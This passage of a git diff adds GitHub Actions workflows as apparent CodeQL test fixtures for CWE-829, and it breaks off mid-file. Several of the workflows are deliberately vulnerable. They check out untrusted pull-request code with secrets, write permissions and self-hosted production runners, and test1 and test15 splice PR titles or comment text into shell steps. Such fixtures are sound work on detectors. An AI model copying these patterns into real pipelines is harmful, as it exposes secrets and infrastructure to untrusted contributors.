./.github/workflows/reusable_local.yml + with: + branch: ${{ github.event.pull_request.head.ref }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml new file mode 100644 index 000000000000..96fd8bdd1a4b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml @@ -0,0 +1,37 @@ +name: Tests +on: + push: + branches: + - master + pull_request: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + codeql test run ql/test diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml new file mode 100644 index 000000000000..3cab86f3171b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml new file mode 100644 index 000000000000..e8b5466f7516 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test10.yml @@ -0,0 +1,37 @@ +name: Build Android app (stripe) +on: + push: + branches: + - main + - fix-ci + workflow_dispatch: + pull_request_target: + branches: + - main + paths: + - 'custom-payment-flow/client/android-kotlin/**' + - '!**.css' + - '!**.md' + +jobs: + android_build: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.after || github.event.pull_request.head.sha }} + + - name: Build + working-directory: custom-payment-flow/client/android-kotlin + run: | + ./gradlew build + + dependabot-auto-merge: + if: ${{ github.event.pull_request && github.actor == 'dependabot[bot]' }} + needs: android_build + permissions: + contents: write + pull-requests: write + uses: ./.github/workflows/wf_dependabot.yaml + secrets: inherit diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml new file mode 100644 index 000000000000..16bb6bf876c3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml @@ -0,0 +1,94 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml @@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml new file mode 100644 index 000000000000..0a73e86d5fc6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml @@ -0,0 +1,31 @@ +on: + issue_comment: + types: + - created +jobs: + danger-for-external: + name: Danger for external - Node.js 16 + if: | + github.event_name == 'issue_comment' && github.event.action == 'created' + && github.event.issue.pull_request != null + && startsWith(github.event.comment.body, '/danger') + runs-on: ubuntu-latest + steps: + - name: Check repository permission for user + uses: sushichop/action-repository-permission@v2 + with: + required-permission: write + reaction-permitted: rocket + comment-not-permitted: Sorry, you don't have enough permission to execute `/danger`... + - name: Clone the PR source + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.issue.number }}/head + fetch-depth: 0 + - uses: actions/setup-node@v3 + with: + node-version: 16 + - name: Danger JS + run: npx danger ci + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml new file mode 100644 index 000000000000..6f03a0e966a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml @@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml @@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml new file mode 100644 index 000000000000..4ceb9a4c72ff --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml @@ -0,0 +1,294 @@ +name: Post-Build +run-name: Post-Build on ${{ github.event.workflow_run.head_branch }} +on: + workflow_run: + types: [ 'completed' ] + workflows: + - Build +concurrency: + # Cancel concurrent jobs on pull_request but not push, by including the run_id in the concurrency group for the latter. + group: post-build-${{ github.event.workflow_run.event == 'push' && github.run_id || 'pr' }}-${{ github.event.workflow_run.head_branch }} + cancel-in-progress: true + +env: + COMPOSER_ROOT_VERSION: "dev-trunk" + SUMMARY: Post-Build run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for Build run [#${{ github.event.workflow_run.id }}](${{ github.event.workflow_run.html_url }}) + +permissions: + actions: read + contents: read + pull-requests: read + +# Note the job logic here is a bit unusual. That's because this workflow is triggered by `workflow_run`, and so is not shown on the PR by default. +# Instead we have to manually report back, including where we could normally just skip or let a failure be handled. +# - If the "Build" job failed, we need to set our status as failed too (build_failed). +# - If the find_artifact job fails for some reason, we need a step to explicitly report that back. +# - If no plugins are found, we need to explicitly report back a "skipped" status. +# - And the upgrade_test job both explicitly sets "in progress" at its start and updates at its end. +# +# If you're wanting to add a new check, you'd want to do the following: +# - Add a step in the `setup` workflow to create your check, and a corresponding output for later steps to have the ID. +# - Add a step in the `build_failed` workflow to set your run to cancelled. +# - Add a job to run whatever tests you need to run, with steps similar to the `upgrade_test` workflow's "Get token", "Notify check in progress", and "Notify final status". +# - Add a step in the `no_plugins` workflow to set your run to skipped if your job only runs when there are plugins built. + +jobs: + setup: + name: Setup + runs-on: ubuntu-latest + timeout-minutes: 2 # 2022-12-20: Seems like it should be fast. + outputs: + upgrade_check: ${{ steps.upgrade_check.outputs.id }} + steps: + - name: Log info + run: | + echo "$SUMMARY" >> $GITHUB_STEP_SUMMARY + + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Create "Test plugin upgrades" check' + id: upgrade_check + uses: ./.github/actions/check-run + with: + name: Test plugin upgrades + sha: ${{ github.event.workflow_run.head_sha }} + status: queued + title: Test queued... + summary: | + ${{ env.SUMMARY }} + token: ${{ steps.get_token.outputs.token }} + + build_failed: + name: Handle build failure + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion != 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" cancelled' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: cancelled + title: Build failed + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the build did not succeed. + token: ${{ steps.get_token.outputs.token }} + + find_artifact: + name: Find artifact + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion == 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + outputs: + zip_url: ${{ steps.run.outputs.zip_url }} + any_plugins: ${{ steps.run.outputs.any_plugins }} + steps: + - uses: actions/checkout@v4 + + - name: Find artifact + id: run + env: + TOKEN: ${{ github.token }} + URL: ${{ github.event.workflow_run.artifacts_url }} + run: | + for (( i=1; i<=5; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Fetch list of artifacts (attempt $i/5)" + JSON="$(curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$URL" + )" + echo "$JSON" + echo "::endgroup::" + ZIPURL="$(jq -r '.artifacts | map( select( .name == "jetpack-build" ) ) | sort_by( .created_at ) | last | .archive_download_url // empty' <<<"$JSON")" + PLUGINS="$(jq -r '.artifacts[] | select( .name == "plugins.tsv" )' <<<"$JSON")" + if 